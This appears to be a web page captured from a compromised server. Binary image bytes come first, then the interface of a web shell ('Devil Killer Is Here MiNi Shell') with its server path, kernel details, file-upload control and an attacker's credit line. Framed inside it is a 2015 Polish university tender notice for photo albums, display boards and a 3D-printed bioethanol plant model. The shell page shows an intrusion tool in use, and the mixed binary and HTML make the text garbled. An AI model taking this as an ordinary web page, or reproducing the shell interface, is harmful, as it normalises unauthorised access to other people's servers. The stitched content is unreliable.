JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150430/61477-N-2015.html

<p class="kh_header"><b>Olsztyn: Usługa opracowania i wykonania makiety wraz z albumami fotograficzno-informacyjnymi oraz planszami obrazującymi badania na potrzeby Centrum Badań Energii Odnawialnej Uniwersytetu Warmińsko-Mazurskiego w Olsztynie ze środków pozyskanych z projektu współfinansowanego przez Narodowe Centrum Badań i Rozwoju - Projekt Strategiczny - Zaawansowane technologie pozyskiwania energii, Zadanie nr 4 - Opracowanie zintegrowanych technologii wytwarzania paliw i energii z biomasy, odpadów rolniczych i innych</b><br>
<b>Numer ogłoszenia: 61477 - 2015; data zamieszczenia: 30.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa opracowania i wykonania makiety wraz z albumami fotograficzno-informacyjnymi oraz planszami obrazującymi badania na potrzeby Centrum Badań Energii Odnawialnej Uniwersytetu Warmińsko-Mazurskiego w Olsztynie ze środków pozyskanych z projektu współfinansowanego przez Narodowe Centrum Badań i Rozwoju - Projekt Strategiczny - Zaawansowane technologie pozyskiwania energii, Zadanie nr 4 - Opracowanie zintegrowanych technologii wytwarzania paliw i energii z biomasy, odpadów rolniczych i innych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.  Przedmiot usługi:
Opracowanie, wykonanie i dostawa makiety wraz z albumami fotograficzno-informacyjnymi oraz rozwijanymi planszami obrazującymi badania wykonane w projekcie strategicznym.
II. Termin wykonania usługi:
1.	Realizacja zamówienia  jest podzielona na 2 etapy.
2.	W skład I etapu wchodzi opracowanie i dostawa albumu fotograficzno-informacyjnego podsumowującego badania wykonane w ramach Projektu Strategicznego oraz projektu graficznego wraz z wykonaniem rozwijanych plansz;
3.	W skład II etapu wchodzi opracowanie i dostawa makiety. 
4.	Wykonanie i dostawa zamówienia z etapu I nastąpi do dnia 22.05.2015 r. 
5.	Wykonanie i dostawa zamówienia z etapu II nastąpi do dnia 30.06.2015 r.
III. Szczegółowy opis przedmiotu usługi:
ETAP I - wykonanie 200 sztuk albumów fotograficzno-informacyjnych podsumowujących badania wykonane w ramach Projektu Strategicznego oraz wykonanie 7 sztuk rozwijanych plansz.
ALBUM: 
1.	Kompleksowa usługa polegająca na opracowaniu koncepcji kreatywnej albumu promującego rezultaty badań osiągnięte w ramach projektu PROGRAM STRATEGICZNY - ZAAWANSOWANE TECHNOLOGIE POZYSKIWANIA ENERGII ZADANIE NR 4 - Opracowanie zintegrowanych technologii wytwarzania paliw i energii z biomasy, odpadów rolniczych i innych.
2.	Usługa obejmuje: opracowanie koncepcji kreatywnej, opracowanie projektu graficznego, przygotowanie okładki, rozmieszczenie tekstu i zdjęć, ze ścisłym uwzględnieniem zaleceń i uwag przekazanych Wykonawcy przez Zamawiającego oraz druk i dostawę albumów fotograficzno-informacyjnych w ilości 200 szt. 
3.	W albumie (okładka) powinny być zamieszczone znaki graficzne (logotypy) dostarczone przez Zamawiającego wraz z odwołaniem słownym. Pozostałe treści, kolory do uzgodnienia pomiędzy Wykonawcą a Zamawiającym w trakcie realizacji. 
4.	Treść która ma znaleźć się albumie fotograficzno-informacyjnym zostanie dostarczona Wykonawcy w terminie 3 dni roboczych od dnia zawarcia umowy.
5.	Specyfikacja:
a)	200 sztuk 
b)	format 205x205 mm
c)	liczba stron w pełnym kolorze (4+4) - 100 (+/-10) + okładka
d)	ilustracje spadowe druk 4+4
e)	sposób oprawy - szyto-klejona
6.   Okładka: 
a)	papier: kreda 350 g mat,
b)	uszlachetnienie: folia błysk jednostronnie + wybiórczo folia mat z przetłoczeniem,
c)	kolor 4+1
7. Środek: 
a)	Papier: kreda 150 g mat
b)	Uszlachetnienie: brak
c)	Kolor: 4+4
d)	Ilość stron: 100 (+/-10)
e)	Zdjęcia- część zdjęć umieszczonych spadowo.
8.	W albumie znajdzie się 100(+/-10) zdjęć dostarczonych przez Zamawiającego, które Wykonawca podda graficznej obróbce. 
9.	Wybór zdjęć, grafika i projekt przed wydrukiem musi uzyskać pisemną akceptację Zamawiającego. Wykonawca przekaże ponadto projekt zaakceptowanego przez Zamawiającego albumu w wersji elektronicznej, w formacie pdf do druku, na nośniku elektronicznym wraz z autorskimi prawami majątkowymi do projektu na piśmie.
10.	Przygotowanie do druku: 
a)	przygotowanie ostatecznej wersji projektu graficznego albumu w formie elektronicznej na płycie CD w formacie (PDF) i wydrukowanej (wydruk próbny) do końcowej akceptacji przez Zamawiającego;
b)	Wykonawca dostarczy wydruki próbne do siedziby Zamawiającego po końcowej akceptacji przez Zamawiającego przygotowanie ostatecznej wersji elektronicznej albumu/folderu:
c)	podczas przygotowywania projektu do druku, Wykonawca uwzględni spady oraz pozostawi puste miejsce, w którym po wydruku przebiegać będzie szew scalający album w formacie edytowalnym w programie np. AI, INDD lub CDR umożliwiającym późniejsze wykorzystanie wykonanych zdjęć.
ROZWIJANE PLANSZE: 
1.	Przedmiotem zamówienia jest opracowanie i wykonanie wraz z projektem graficznym 7 sztuk  rozwijanych plansz przedstawiających rezultaty badań osiągnięte w ramach projektu PROGRAM STRATEGICZNY - ZAAWANSOWANE TECHNOLOGIE POZYSKIWANIA ENERGII ZADANIE NR 4 - Opracowanie zintegrowanych technologii wytwarzania paliw i energii z biomasy, odpadów rolniczych i innych.
2.	W rozwijanych planszach muszą być zamieszczone znaki graficzne (logotypy) dostarczone przez Zamawiającego wraz z odwołaniem słownym. Zdjęcia jakie mają być zamieszczone w rozwijanych planszach zostaną dostarczone przez Zamawiającego. 
3.	Wykonawca jest zobligowany do stworzenia rysunku abstrakcyjnego lub schematu obrazującego badania.
4.	Zamawiający wymaga przedłożenia do akceptacji ostatecznej wersji rozwijanych plansz.
5.	Wykonawca przekaże ponadto projekty zaakceptowanych przez Zamawiającego rozwijanych plansz w wersji elektronicznej (edytowalnej) .cdr,  jpeg i w formacie pdf do druku wraz z autorskimi prawami majątkowymi do projektu na piśmie.
6.	Specyfikacja: 
a)	Wymiary: szerokości 100cm, wysokość 200cm;
b)	Solidna, trwała, składana aluminiowa konstrukcja z mechanizmem rolującym (anodowany na kolor stalowy), srebrny;
c)	Szeroka podstawa, kaseta z aluminium w kształcie łezki, bez nóg stanowiących podstawę stojaka;
d)	Składany (z 3 części) teleskopowy maszt aluminiowy;
e)	Górna listwa mocująca;
f)	Aluminiowa listwa zatrzaskowa;
g)	Wzmocniona torba transportowa;
h)	Wysokiej jakości wydruk rozdzielczości 720-1440 dpi, jednostronny, w pełnym kolorze, na tkaninie banerowej, powlekanej, blockout;
i)	Możliwość szybkiej i łatwej wymiany samego wydruku;
j)	Mechanizm z regulacją naprężenia sprężyny napinającej.
ETAP II. Makieta.
1.	Wykonawca wykona kolorową makietę architektoniczną przestrzenną instalacji demonstracyjnej do produkcji bioetanolu z masy lignocelulozowej  w skali 1:13 - 1:15. 
2.	Technika wykonania - wykorzystanie druku 3D w technologii CJP przy wykorzystaniu materiałów z serii VisiJet PXL.
3.	Makieta ma być zabezpieczona przed uszkodzeniem przez oglądających, umieszczona w trwałej gablocie (pleksi), stojąca na stole z możliwością odkręcania nóg. Makieta powinna być opisana i posiadać legendę oraz metrykę - logotypy i odwołania słowne na grawerowanej blaszce przy dłuższej krawędzi makiety (wymagane elementy dostarczone i do uzgodnienia pomiędzy Wykonawcą a Zamawiającym w trakcie realizacji umowy);
4.	Makieta powinna przedstawiać w formie przestrzennej instalację. Poszczególne elementy powinny ukazywać nie tylko bryłę zewnętrzną danego elementu, ale również część wnętrza/przekroje.  
5.	Podstawowe parametry obiektu w którym zainstalowana będzie pilotażowa instalacja:
a)	długość - 8,05 m
b)	szerokość - 6,85 m
c)	wysokość - ok. 4 m
d)	kubatura ok. 220,57 m3
e)	liczba kondygnacji - 1 naziemna
6.   Elementy składające się na instalację:
a)	Młyn do rozdrabniania masy lignocelulozowej (zrębków) 
b)	Reaktor do obróbki wstępnej i hydrolizy enzymatycznej (3 szt.): 
c)	trzy reaktory połączone równolegle z system dozowania substratów oraz odbioru produktów, pojemność całkowita 300 l każdy;
d)	wyposażony w mieszadło mechaniczne, zasilane elektrycznie:  
-  Separator frakcji;
-  Układ zatężania RO;
-  Fermentor (2 szt.).
e)	fermentory połączone równolegle z układem zatężania oraz destylatorem o pojemności całkowitej 120 l 
-	Destylator:
-	Zbiorniki do przechowywania odpadów 
-	Stanowisko do przygotowywania i przechowywania reagentów 
-	Zbiornik na wodę po osmozie
-	infrastruktura dookoła instalacji:
-	Postać ludzka max 5 osób
-	Minikoparka ładująca substrat x 2
-	Drogi
-	Trawniki
-	Chodniki
-	Cała instalacja osadzona w budynku z odsłoniętą częścią dachu oraz ścian
f)	Obok budynku będzie znajdowało się pole wierzby energetycznej (powierzchnia ok 7 x 4 m) o wysokości ok 2,5 m wraz z sieczkarnią samojezdną (np. john deer 7200 + przystawka).
7.	Podane wymiary są wymiarami rzeczywistymi. Dopuszczalna zmiana wymiarów do 5%.
8.	Szczegółowe wymiary poszczególnych elementów składających się na całość instalacji oraz ich rzuty poglądowe Zamawiający przekaże w plikach PDF w trakcie realizacji umowy na wniosek Wykonawcy.
9.	Przed wykonaniem makiety Wykonawca jest zobowiązany do:
9.1.	dostarczenia mapki sytuacyjnej makiety w formie elektronicznej (jpg + pdf + cdr) po uzgodnieniu z Zamawiającym rozmieszczenia poszczególnych elementów instalacji;
9.2.	stworzenia po uzyskaniu akceptacji mapki sytuacyjnej modelu 3D makiety.
10.	Po akceptacji modelu 3D przez Zamawiającego, Wykonawca wykona makietę według specyfikacji oraz dostarczy do siedziby Zamawiającego.
11.	Makieta musi być oczyszczona, utwardzona, złożona.
12.	Dobór kolorów poszczególnych elementów instalacji zostanie ustalony podczas przygotowania modelu 3D pomiędzy Wykonawcą a Zamawiającym.
13.	Zamawiający zobowiązuje się dostarczyć wszystkie wymagane loga i elementy graficzne po wyborze oferty.  
IV. Inne wymagania Zamawiającego.
1.	Zamawiający wymaga aby Wykonawca każdorazowo przekazywał Zamawiającemu projekty przedmiotów usługi do pisemnej akceptacji przed ostateczną wersją do druku lub dostawy. Zamawiający zobowiązuje się do przekazania akceptacji lub zgłoszenia uwag w terminie 2 dni roboczych liczonych od momentu przesłania projektów. 
2.	Wszystkie niezbędne dokumenty właściwe dla należytego wykonania tej usługi Zamawiający przekaże Wykonawcy w terminie 3 dni od dnia zawarcia umowy. 
3.	Sposób konsultacji strony ustalą wzajemnie w trakcie realizacji umowy.
4.	Cena musi zawierać  wszystkie koszty produkcji, postprodukcji oraz transportu;
5.	Zamawiający dokona rozliczenia z Wykonawcą po zrealizowaniu dostawy z każdego etapu na podstawie protokołu odbioru podpisanego przez obie strony jako bez zastrzeżeń.
6.	Wszystkie informacje dotyczące realizowanego projektu oraz logotypy dostępne są na można uzyskać na stronie internetowej http://www.uwm.edu.pl/cbeo/pk/index.php/pl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego; 
2. Wypełniony i podpisany formularz Opis przedmiotu zamówienia (sporządzony zgodnie z Załącznikiem nr 1 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia ); 
3. Wypełniony i podpisany formularz oferty, sporządzony zgodnie z Załącznikiem nr 2 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia;
 4. Oświadczenie z art. 22 sporządzone zgodnie z Załącznikiem nr 3 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia; 
5. Oświadczenie o braku podstaw do wykluczenia z postępowania sporządzone zgodnie z Załącznikiem nr 4 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia ; 
6. Oświadczenie z art. 24 ust. 2 pkt. 5 Ustawy Pzp sporządzone zgodnie z Załącznikiem nr 5 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin dostawy - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli zmiany dotyczą zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności niedających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej o charakterze naturalnym np. powódź, huragan, trzęsienie ziemi, sztorm, śnieżyca etc</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.uwm.edu.pl/zamowienia/przetargi_nowe/lista-przetargow.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie Dział Zamówień Publicznych ul. Oczapowskiego 2, pok. 305, 10-719 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 10:00, miejsce: Uniwersytet Warmińsko-Mazurski w Olsztynie Dział Zamówień Publicznych ul. Oczapowskiego 2, pok. 311, 10-719 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Wymagany termin wykonania niniejszego zamówienia: 
1.1.	Etap I: do dnia 22.05.2015 r. od dnia zawarcia umowy;
1.2.	Etap II: do dnia 30.06.2015 r. od dnia zawarcia umowy.
2.	Wykonawcy, którzy zgodnie ze swoją wiedzą i doświadczeniem, są w stanie wykonać przedmiotowe zamówienie w terminie krótszym niż wyznaczony powyżej, mogą zaproponować następujące terminy dostawy, którym Zamawiający przyporządkował odpowiednią punktację: 
      2.1.  Etap 1: 
      2.1.1. 15.05.2015 r. - 5 pkt.;
      2.1.2. 20.05.2015 r. - 3 pkt.;
      2.1.3. 22.05.2015 r. - 0 pkt. 
      2.2. Etap II:
      2.2.1. 15.06.2015 r. - 5 pkt.;
      2.2.2. 22.06.2015 r. - 3 pkt.;
      2.2.3. 30.06.2015 r. - 0 pkt. 
3. . Usługa realizowana na potrzeby Centrum Badań Energii Odnawialnej Uniwersytetu Warmińsko-Mazurskiego w Olsztynie ze środków pozyskanych z projektu współfinansowanego przez Narodowe Centrum Badań i Rozwoju - Projekt Strategiczny - Zaawansowane technologie pozyskiwania energii, Zadanie nr 4 - Opracowanie zintegrowanych technologii wytwarzania paliw i energii z biomasy, odpadów rolniczych i innych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com